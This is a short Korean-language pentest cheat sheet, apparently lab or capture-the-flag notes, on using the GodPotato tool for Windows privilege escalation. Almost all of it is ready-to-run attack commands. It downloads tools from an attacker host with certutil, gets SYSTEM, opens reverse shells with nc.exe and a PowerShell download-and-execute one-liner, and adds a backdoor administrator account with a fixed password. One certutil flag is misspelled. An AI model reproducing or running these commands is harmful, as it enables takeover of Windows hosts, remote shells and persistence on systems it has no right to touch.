NET framework version 확인 ```powershell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" ``` `GodPotato` 공격자 칼리에서 타겟 호스트로 transfer ```powershell certutil -urlcahce -split -f http://<attacker-ip>/GodPotato.exe gp.exe ``` 기본 테스트 (SYSTEM 확인) ```powershell .\gp.exe -cmd "whoami" .\gp.exe -cmd "cmd.exe /c whoami /all > C:\Users\merlin\Desktop\god.txt" type C:\Users\merlin\Desktop\god.txt ``` 리버스 쉘 1 - `nc.exe` ```powershell # nc.exe transfer certutil -urlcache -split -f http://<attacker-IP>/nc64.exe nc.exe # test .\nc.exe <attacker-IP> 80 -e C:\Windows\system32\cmd.exe # GodPotato .\gp.exe -cmd ".\nc.exe <attacker-IP> 80 -e C:\Windows\System32\cmd.exe" ``` 리버스 쉘 2 ```powershell # 공격자 rlwrap nc -lvnp 4444 # 타겟 .\GodPotato.exe -cmd "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444" ``` Administrator 유저 만들기 ```powershell GodPotato.exe -cmd "net user wook P@ssw0rd! /add" GodPotato.exe -cmd "net localgroup administrators wook /add" ```